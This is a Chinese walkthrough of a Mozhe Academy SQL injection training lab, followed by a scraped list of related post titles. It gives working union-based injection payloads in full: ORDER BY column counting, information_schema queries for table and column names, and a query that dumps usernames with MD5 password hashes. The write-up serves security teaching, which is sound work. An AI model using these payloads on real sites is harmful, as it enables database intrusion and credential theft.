一·判断注入

输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。

二·判断字段

URL id=-1 order by 1

URL id=-1 order by 2

URL id=-1 order by 3

URL id=-1 order by 4

URL id=-1 order by 5 此时报错,说明有四个字段

三·使用union查询注入点

输入union select 1,2,3,4

发现2,3为显注点

四·使用database()查库名

输入 union select 1,database(),3,4

查出库名为 mozhe_Discuz_StormGroup

五·查表名

输入

union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

查询到StormGroup_member,notice

看见member,所以对第一个产生怀疑。所以首先查询第一个。

六·查询StormGroup_member中的存放的字段

输入

union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’

查询出id,name,password,status

七·查询密码和用户名

union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member

得到md5加密后的值。进行解密,得到密码。

如果密码不对,通过limit m,n来继续查询。

八·提交key

得到密码后进行登录可以看见key,复制,提交。

墨者学院PHP,墨者学院SQL注入解题相关推荐

  1. 超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门

    超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门 靶场网站,网站所有权在二向箔安全学院 知识盒子 简单的SQL注入题目,可以用来入门练习,体验一下实训 老套的题目:提取网 ...

  2. 强网杯 2019]随便注 【SQL注入】四种解法

    题目简介 题目名称:[强网杯 2019]随便注 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = ...

  3. 墨者学院-SQL注入漏洞测试(报错盲注)

    继续攻克SQL注入类题目啦!!!今天的题目环境提示比较明显,也是比较常见的一种SQL注入漏洞类型,继续储备知识,撸起袖子加油干!!! 附上题目链接:https://www.mozhe.cn/bug/d ...

  4. 墨者学院-SQL注入漏洞测试(布尔盲注)

    决心按部就班.由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路.本题靶场环境比较简单.也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目.废话 ...

  5. 渣渣白学习渗透之路(墨者学院sql注入之旅)

    渣渣白学习渗透之路 说明:1.  未经授权的渗透测试都是违法的! 2.  文章用红色字体编写的部分是关键部分(认真看)!!! 3.  文章用黑色字体编写的部分是渣渣白内心独白,无关紧0! 4.  文章 ...

  6. 墨者学院 靶场练习(一) SQL注入

    墨者学院 在线靶场 工具: sqlmap 第一题: SQL手工注入漏洞测试(MySQL数据库-字符型) 利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_423 ...

  7. sql注入(2) 墨者学院之SQL手工注入漏洞测试(MySQL数据库-字符型)

    目录 1.工具及靶场环境 2.解题步骤 2.1判断注入点 2.2判断字段数 2.3信息收集 2.4爆破数据库 2.4.1爆破数据库表名 2.4.2爆破指定表的列名 2.4.3查询账号密码 3.md5解 ...

  8. 某学院系统sql注入到服务器沦陷(bypss)

    前言 前一段时间都在挖edu src,为了混几个证书,中间陆陆续续也挖到好几枚系统的通杀吧,不过资产都不多,都是黑盒测试出来的,没啥技术含量.只有这次挖到的这枚通杀稍微有那么一点点价值,从外网web一 ...

  9. 湘潭大学网络编程_湘潭大学计算机学院网络空间安全学院“湘韵”研究生论坛成功举行...

    聚计网湘韵,享学术盛宴 聚计网湘韵,享学术盛宴.2020年11月26日下午,由湘潭大学计算机学院·网络空间安全学院举办的研究生湘韵论坛在工科楼阶梯教室举行,全体研究生新生参加,肖芬副院长致开幕辞. & ...

最新文章

  1. 动态规划4--最佳加法表达式
  2. 用xlg.tel来管理自己
  3. python3 中print 显示不全问题
  4. 市面上主流的TCC框架介绍
  5. 怎样进入android模式,安卓手机如何进入Recovery模式的通用方式详解
  6. linux安全服务管理,Linux系统安全管理服务配置方法与技巧
  7. Things That Cannot Change
  8. Vue前后端对接时判断是否与后端连接成功
  9. 开始投靠C#,入门版(一)
  10. 4.3 createjs
  11. 【最新】Oracle官网Java SE各个版本JDK下载位置
  12. 关键词组合工具-自动关键词挖掘组成关键词软件免费
  13. 人工智能十大算法_套磁amp;科研 |南加利福尼亚大学空间科学研究所终身教授YaoYi Chiang带来数据挖掘算法研究课题...
  14. 【软技能】完全写作指南--简历
  15. 如何制作DUN-14条形码
  16. 【python】rank函数
  17. 这是浙江大学郑强教授的经典语录 虽然我不完全赞同但对他的精神佩服的五体投地...
  18. c# 使用Office com组件时遇到的问题
  19. 王某与石某的分歧卡卡罗特
  20. python中http协议编程_python网络编程、套接字、HTTP协议

热门文章

  1. 日志收集平台Graylog2以及Nxlog的安装与配置(基于docker)
  2. 一个小小的互联网创业狗的自白
  3. java中写定时任务
  4. 激荡10年,珍贵的毕业礼物
  5. DXC Technology Company旗下公司Luxoft完成对CMORE Automotive的收购
  6. Rhel 7.3 基本操作
  7. Exchange Server 2016 RTM快速部署指南
  8. 时针分针角度问题(不含秒针)
  9. 工具类产品应该如何运营推广?
  10. 每天学命令list_property